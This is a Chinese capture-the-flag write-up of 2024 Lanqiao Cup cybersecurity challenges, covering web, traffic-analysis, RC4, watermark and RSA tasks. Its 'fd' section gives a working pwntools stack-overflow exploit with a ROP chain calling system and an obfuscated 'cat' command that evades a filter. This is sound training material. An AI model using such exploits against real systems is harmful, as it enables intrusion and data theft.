2024第十五届蓝桥杯网络安全赛项部分题目 WriteUp

合集 - Writeup(4)

1.2024第十五届蓝桥杯网络安全赛项部分题目 WriteUp2024-04-29

2.电科院密码保密与信息安全竞赛网络攻防宣传赛 Writeup2024-04-013.“复兴杯”2023第四届大学生网络安全精英赛排位赛 Writeup2024-05-194.2024全国大学生信息安全竞赛创新实践能力赛初赛 CISCN2024 部分题目个人Writeup2024-05-27

收起

2024第十五届蓝桥杯网络安全赛项部分题目 WriteUp

爬虫协议#

根据提示，访问/robots.txt，得到敏感路径 /38063b612387b10e22f4bd0d71a46a4e/，访问其中的/9de33df789dc91e984a091e6dce2dfb1得到flag。

Copy
flag{494547b4-f13f-47de-b1a5-a99f20495cd7}

packet#

使用过滤器tcp contains "flag" 找到flag相关的包，追踪HTTP流得到返回数据ZmxhZ3s3ZDZmMTdhNC0yYjBhLTQ2N2QtOGE0Mi02Njc1MDM2OGMyNDl9Cg==，base64解码得到flag

flag{7d6f17a4-2b0a-467d-8a42-66750368c249}

cc#

打开网页，可以获得密文、key和IV，直接使用工具解密：

rc4#

根据提示可知为RC4加密，分析程序，猜测Str为密码，v5为密文，将v5转为unsigned char后利用脚本解密可得flag。

脚本：

Copy
import base64
def rc4_main(key = "init_key", message = "init_message"):
    print("RC4解密主函数调用成功")
    print('\n')
    s_box = rc4_init_sbox(key)
    crypt = rc4_excrypt(message, s_box)
    return crypt
def rc4_init_sbox(key):
    s_box = list(range(256))
    print("原来的 s 盒：%s" % s_box)
    print('\n')
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    print("混乱后的 s 盒：%s"% s_box)
    print('\n')
    return s_box
def rc4_excrypt(plain, box):
    print("调用解密程序成功。")
    print('\n')
    plain = base64.b64decode(plain.encode('utf-8'))
    plain = bytes.decode(plain)
    res = []
    i = j = 0
    for s in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256
        k = box[t]
        res.append(chr(ord(s) ^ k))
    print("res用于解密字符串，解密后是：%res" %res)
    print('\n')
    cipher = "".join(res)
    print("解密后的字符串是：%s" %cipher)
    print('\n')
    print("解密后的输出(没经过任何编码):")
    print('\n')
    return cipher
a=[182,66,183,252,240,162,94,169,61,41,54,31,84,41,114,168,99,50,242,68,139,133,236,13,173,63,147,163,146,116,129,101,105,236,228,57,133,169,202,175,178,198] #cipher
key="gamelab@"
s=""
for i in a:
    s+=chr(i)
s=str(base64.b64encode(s.encode('utf-8')), 'utf-8')
rc4_main(key, s)

得到flag：

解密后的字符串是：flag{12601b2b-2f1e-468a-ae43-92391ff76ef3}

缺失的数据#

使用压缩包中的secret.txt作为字典破解压缩包中加密的a.png，然后利用题目附带的脚本稍作修改后运行：

Copy
import numpy as np
import cv2
import pywt


class WaterMarkDWT:
    def __init__(self, origin: str, watermark: str, key: int, weight: list):
        self.key = key
        self.img = cv2.imread(origin)
        self.mark = cv2.imread(watermark)
        self.coef = weight
 

    def arnold(self, img):
        r, c = img.shape
        p = np.zeros((r, c), np.uint8)
 
        a, b = 1, 1
        for k in range(self.key):
            for i in range(r):
                for j in range(c):  
                    x = (i + b * j) % r
                    y = (a * i + (a * b + 1) * j) % c
                    p[x, y] = img[i, j]
        return p
 
    def deArnold(self, img):
        r, c = img.shape
        p = np.zeros((r, c), np.uint8)
 
        a, b = 1, 1
        for k in range(self.key):
            for i in range(r):
                for j in range(c): 
                    x = ((a * b + 1) * i - b * j) % r
                    y = (-a * i + j) % c
                    p[x, y] = img[i, j]
        return p
 

 
    def get(self, size: tuple = (1200, 1200), flag: int = None):
        img = cv2.resize(self.img, size)
 
        img1 = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
        img2 = cv2.cvtColor(self.mark, cv2.COLOR_RGB2GRAY)
 
        c = pywt.wavedec2(img2, 'db2', level=3)
        [cl, (cH3, cV3, cD3), (cH2, cV2, cD2), (cH1, cV1, cD1)] = c
 
        d = pywt.wavedec2(img1, 'db2', level=3)
        [dl, (dH3, dV3, dD3), (dH2, dV2, dD2), (dH1, dV1, dD1)] = d
 
        a1, a2, a3, a4 = self.coef
 
        ca1 = (cl - dl) * a1
        ch1 = (cH3 - dH3) * a2
        cv1 = (cV3 - dV3) * a3
        cd1 = (cD3 - dD3) * a4
 
        waterImg = pywt.waverec2([ca1, (ch1, cv1, cd1)], 'db2')
        waterImg = np.array(waterImg, np.uint8)
 
        waterImg = self.deArnold(waterImg)
 
        kernel = np.ones((3, 3), np.uint8)
        if flag == 0:
            waterImg = cv2.erode(waterImg, kernel)
        elif flag == 1:
            waterImg = cv2.dilate(waterImg, kernel)
 
        cv2.imwrite('水印.png', waterImg)
        return waterImg


if __name__ == '__main__':
    img = 'a.png'
    waterImg = 'newImg.png'
    k = 20
    xs = [0.2, 0.2, 0.5, 0.4]
    W1 = WaterMarkDWT(img, waterImg, k, xs)
    W1.get()

得到 水印.png，打开可以看到flag。

fd#

简单的栈溢出，但是要根据题目提示，将cat的输出返回到管道符2中，解题脚本如下：

Copy
#!/usr/bin/python3
# -*- encoding: utf-8 -*-

from pwn import *

p = remote("47.93.142.153", 25722)
elf = ELF("/mnt/c/Users/崔志鹏/Desktop/临时/pwn")

start_address = 0x400862
ret_address = 0x04005ae
pop_rdi = 0x0400933

# 64位
context(arch="amd64",os="linux")
stack_len = 0x20 + 0x8

payload = b'\x00'*stack_len + p64(ret_address) + p64(pop_rdi) + p64(0x00601090) + p64(elf.plt['system']) 
p.sendline(b"ca''t f*>&2")
p.sendline(payload)

p.interactive() #can can need

Theorem#

题目脚本中p、q是相邻的素数，间距较小，利用工具中的费马分解得到p、q，随后即可得到私钥及明文。